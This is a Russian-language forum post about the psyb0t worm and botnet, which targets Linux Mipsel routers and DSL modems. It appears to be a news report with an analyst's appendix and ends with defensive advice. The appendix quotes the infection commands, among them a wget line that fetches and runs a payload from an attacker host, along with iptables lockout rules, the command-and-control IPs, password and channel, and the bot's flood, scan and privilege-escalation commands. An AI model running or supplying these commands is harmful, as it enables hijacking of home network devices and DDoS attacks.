Эпидемия вируса для роутеров и DSL-модемов.

Автор Catcatcat, 06-07-2012, 21:45:05

« предыдущая - следующая »

0 Пользователей и 1 гость просматривают эту тему.

Catcatcat

Эпидемия вируса для роутеров и DSL-модемов.

Cерьезную опасность обнаружили администраторы сайта DroneBL. Примерно две недели назад на сайт была совершена DDoS-атака. При расследовании инцидента выяснилось, что атаку производили зараженные роутеры и DSL-модемы. Дальнейший анализ показал, что в Интернете появилась первая ботнет-сеть, которая базируется не на ПК и серверах, а на сетевом оборудовании домашнего уровня. Эта вредоносная сеть вместе с червем, распространяющим заразу, получила название «psyb0t».

Механизм заражения «psyb0t» оказался довольно необычным. Заражению подвержены любые устройства с маршрутизацией пакетов на базе операционной системы Linux Mipsel, снабженные административным интерфейсом, либо открывающие доступ через службы sshd или telnetd для демилитаризованной зоны DMZ, если у них заданы слабые сочетания имени пользователя и пароля (включая устройства openwrt/dd-wrt). Червь «psyb0t» использует алгоритм подбора имен пользователя и паролей, а также несколько стратегий для перехвата управления устройством.

После заражения червь «psyb0t» встраивает фрагмент вредоносного кода в операционную систему устройства – в состав червя входят варианты кода для нескольких версий системы Mipsel, они загружаются с центрального сервера злоумышленников. Затем червь закрывает конечному пользователю доступ к устройству по telnet, sshd и через веб-интерфейс, а сам начинает исследовать все проходящие через устройство пакеты, выуживая из них различные имена и пароли. Также червь пересылает своим владельцам информацию о наличии в локальной сети серверов с уязвимыми конфигурациями службы phpMyAdmin и СУБД MySQL. По данным DroneBL, уже сейчас в ботнет-сети насчитывается более 100 тысяч активных зараженных устройств, используемых для похищения частной информации и проведения крупномасштабных DDoS-атак. Особую опасность, по мнению первооткрывателей, представляет то, что большинство домашних пользователей, скорее всего, не смогут заметить присутствия червя «psyb0t» в своей сети.
Не успело подробное описание червя появиться в блоге DroneBL, как поступила новая информация автора psyb0t. Он уверяет, что написал червя с исследовательскими целями и теперь прекращает дальнейшую работу над ним. Также он уверяет, что сумел захватить порядка 80 000 устройств, но никогда не использовал этот ботнет для DDoS-атак, фишинга или кражи личных данных.


Примечание paxlo:

После попадания в систему, сифилис использует следующую стратегию:

1) Запускает shell через имеющийся CLI.
   cli> shell

2) Удаляет файл udhcpc.env.
   # rm -f /var/tmp/udhcpc.env

3) Закачивает эксплоит, сохраняет его вместо удалённого файла и запускает:
   # wget http://dweb.webhop.net/.bb/udhcpc.env -P /var/tmp &&
      chmod +x /var/tmp/udhcpc.env && /var/tmp/udhcpc.env &

4) В целях собственной безопасности червь использует встроенный в железку firewall (iptables),
   блокируя доступ к портам через которые она управляется (telnet, ssh, web).
   # iptables -A INPUT -p tcp --dport 23 -j DROP
   # iptables -A INPUT -p tcp --dport 22 -j DROP
   # iptables -A INPUT -p tcp --dport 80 -j DROP

Для управления зараженными устройствами используется протокол IRC.
После заражения устройство пытается подключится к запаролленому IRC серверу (командный центр) и ждет оттуда инструкций.
"Командным центром" червя, с которого происходят все запросы на управление бот сетью, является домен strcpy.us.to.

  IP адреса:
  202.71.102.110 (Малайзия)
  202.67.218.33 (Гонг-Конг)
  216.199.217.170 (США)
  207.155.1.5 (США)
  Порт подключения: 5050
  Пароль: $!0@
  Канал: #mipsel
  Ключ: %#8b
  Ник подключившегося начинается на [NIP] далее идет случайня последовательность. Например [NIP]-IBM6N4SKA.

Теперь злоумышленникам достаточно подать нужную команду в IRC для дальшнейших действий со стороны железок.
Список наиболее интересных команд:
.login   - залогиниться в ботнете
.logout  - вылогиниться
.exit  - вылогиниться из ботнета и удалиться с железки
.sh    - запустить шелл
.tlist   - вывести список процессов
.kill  - убить процесс
.killall - убить все текущие процессы
.silent  - перестать посылать данные в канал
.getip   - показать WAN IP бота
.visit   - атаковать URL используя GET запросы
.scan  - сканировать диапазон адресов на потенциальную уязвимость
.rscan   - сканировать CIDR диапазон на потенциальную уязвимость
.lscan   - тоже для что и .scan, но для локальной сети
.lrscan  - тоже для что и .rscan, но для локальной сети
.sql   - сканировать MySQL сервер на на уязвимости
.pma   - сканировать phpMyAdmin на на уязвимости
.sleep   - даёт команду боту приостановить деятельность
.upgrade - обновить червя с сайта распространителя
.ver   - возвращает версию червя
.rs    - получить обнаруженные логины и ссылки на rapidshare
.rsgen   - сгенерировать ложную рапидную ссылку и отправить пользователю в браузер
.wget  - скачать ссылку
.r00t  - пробовать повысить локальные привилегии до рута используя эксплоит vmsplice
.sflood  - послать SYN пакет на IP
.uflood  - послать UDP пакет на IP
.iflood  - послать ICMP пакет на IP
.pscan   - сканировать порты на указанном IP
.fscan   - подбор паролей на FTP сервисе указанного IP

Самый простой и действенный метод защиты от данного червя - вернуть устройство к заводским настройкам (HARD RESET), залить последнюю версию прошивки, НИ В КОЕМ СЛУЧАЕ не использовать заводские логин:пароль для администрирования железки, а использовать криптостойкие пароли (желательно более 8 символов, символы A-Z, a-z, 0-9, спецсимволы). Также необходимо по возможности отключить порты 21, 22 и WEB консоль со стороны WAN.


http://www.zentron.org/about/news/detail.php?ID=28
http://mag.com.ua/news940.htm
http://www.improv.ru/kms_news+stat+nums-129.html